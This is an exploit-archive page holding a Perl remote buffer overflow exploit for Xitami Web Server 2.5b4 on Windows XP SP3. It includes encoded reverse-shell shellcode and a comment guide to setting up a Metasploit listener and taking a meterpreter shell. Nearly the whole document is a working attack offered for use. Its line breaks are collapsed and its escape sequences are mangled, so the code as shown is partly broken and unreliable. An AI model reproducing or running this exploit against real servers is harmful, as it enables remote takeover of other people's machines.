[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit
# Published : 2011-06-03
# Author : mr.pr0n
# Previous Title : GoldenFTP 4.70 PASS Stack Buffer Overflow
# Next Title : Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)
#!/usr/bin/perl# -------------------------------------------------------------# Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit.# Exploit coded by mr.pr0n [http://s3cure.gr] .# Many greetz to krumel for his help :-).# -------------------------------------------------------------# -------------------------------------------------------------# Tested on: Xitami 2.5b4 / English Windows XP - SP3# -------------------------------------------------------------# ------------------------------------------------------------------------# Bug for 2.5c2 discovered by Krystian Kloskowski (h07) <h07@interia.pl># -------------------------------------------------------------------------## ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ *## --------------------------------# Quick user guide!# --------------------------------# 1st Step: Set up the listener.# --------------------------------# msf > use multi/handler# msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_ord_tcp # PAYLOAD => windows/meterpreter/reverse_ord_tcp# msf exploit(handler) > set LHOST 192.168.178.25# LHOST => 192.168.178.25# msf exploit(handler) > exploit## [*] Started reverse handler on 192.168.178.25:4444 # [*] Starting the payload handler...# # --------------------------------# 2nd Step: Execute the exploit.# --------------------------------# root@bt:~# cd Desktop/ # root@bt:~# ./Xitami2_5b4.pl ## #----[ mr.pr0n ]---------------------------------------------------------## # Target App: Xitami Web Server 2.5b4 ## # Attack : Remote Buffer Overflow Exploit. ## # Target OS : Windows XP Pro English [Service Pack 3]. ## #---------------------------------------------[ http://s3cure.gr ]-------### Enter your target's IP (e.g.: 192.168.0.123)# > 192.168.178.37## [*] Sending the evil header at: 192.168.178.37 ...# [*] OK, exploitation Done!# [*] Check please for the shell...# # --------------------------------# 3nd Step: N'joy your shell :-)# --------------------------------# [*] Transmitting intermediate stager for over-sized stage...(216 bytes)# [*] Sending stage (749056 bytes) to 192.168.178.37# [*] Meterpreter session 1 opened (192.168.178.25:4444 -> 192.168.178.37:1031) at 2011-05-31 02:13:33 +0300## meterpreter > sysinfo# Computer : xxxxxx-xxxxxx# OS : Windows XP (Build 2600, Service Pack 3).# Architecture : x86# System Language : en_US# Meterpreter : x86/win32# meterpreter > shell# Process 320 created.# Channel 1 created.# Microsoft Windows XP [Version 5.1.2600]# (C) Copyright 1985-2001 Microsoft Corp.## C:/Xitami>## ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ * ~ *#use IO::Socket;print "/n#----[ mr.pr0n ]---------------------------------------------------------#/n";print "# Target App: Xitami Web Server 2.5b4 #/n";print "# Attack : Remote Buffer Overflow Exploit. #/n";print "# Target OS : Windows XP Pro English [Service Pack 3]. #/n";print "#---------------------------------------------[ http://s3cure.gr ]-------#/n";print "/nEnter your target's IP (e.g.: 192.168.0.123)";print "/n> ";$target=<STDIN>;chomp($target);#---------------------------#$junk = "/x41" x 72; # 72 x "A".$RET = "/x53/x2b/xab/x71"; # ws2_32.dll push ESP - ret - (Windows XP SP3 - [En]).$jmp = "/xeb/x22"; # JMP +0x22.$nops = "/x90" x 100; # 100 Nops.#---------------------------## ./msfpayload win32_reverse_ord EXITFUNC=thread LHOST=192.168.178.25 LPORT=4444 R | ./msfencode -e PexAlphaNum# [*] Using Msf::Encoder::PexAlphaNum with final size of 261 bytes$shellcode ="/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49"."/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36"."/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34"."/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41"."/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x41/x33/x4b/x4d"."/x46/x56/x4b/x48/x43/x34/x42/x43/x4b/x48/x42/x44/x4e/x30/x4b/x48"."/x42/x55/x4e/x31/x4b/x38/x44/x31/x4b/x48/x44/x37/x42/x42/x4d/x4a"."/x4d/x4a/x50/x54/x43/x50/x48/x30/x4d/x53/x44/x43/x43/x53/x4f/x45"."/x44/x33/x45/x37/x4f/x4e/x4b/x58/x4c/x36/x4a/x50/x4b/x58/x45/x54"."/x4e/x33/x4b/x38/x4e/x54/x45/x50/x4a/x47/x4b/x58/x4e/x44/x4d/x50"."/x4e/x41/x41/x30/x49/x4e/x4b/x58/x41/x34/x4a/x55/x41/x50/x4a/x4e"."/x4b/x48/x41/x57/x4e/x53/x41/x50/x50/x4e/x43/x50/x49/x36/x4e/x50"."/x43/x55/x4c/x46/x41/x30/x4c/x36/x44/x30/x4f/x4f/x42/x4d/x47/x39"."/x4a/x36/x42/x4c/x4a/x4a/x44/x4b/x49/x51/x4a/x36/x44/x50/x42/x50"."/x41/x31/x4e/x35/x49/x58/x41/x4e/x43/x35/x47/x4b/x4e/x50/x43/x35"."/x41/x45/x47/x55/x41/x45/x4c/x56/x42/x41/x41/x55/x47/x35/x48/x55"."/x4f/x4f/x45/x4e/x5a";if ($socket = IO::Socket::INET->new (PeerAddr => $target, PeerPort => "80", Proto => "TCP")) { $exploit = $junk.$RET.$jmp.$nops.$shellcode; # #---------------------------------# # If we send an If-Modified-Since header, # containing an overly long string (for example our exploit) # it may be possible to execute (remotely) a payload!! #---------------------------------# # # This is the evil header! }:-) $header = "GET / HTTP/1.1/r/n". "Host: ".$target." /r/n". "If-Modified-Since: p0wnp0wnb00m! "." $exploit/r/n"; print "/n[*] Sending the evil header at: $target .../n"; print $socket $header."/r/n"; sleep(1); close($socket); print "[*] OK, exploitation Done!/n"; print "[*] Check please the shell../n/n"; }else { print "[-] Connection to $target failed!/n"; }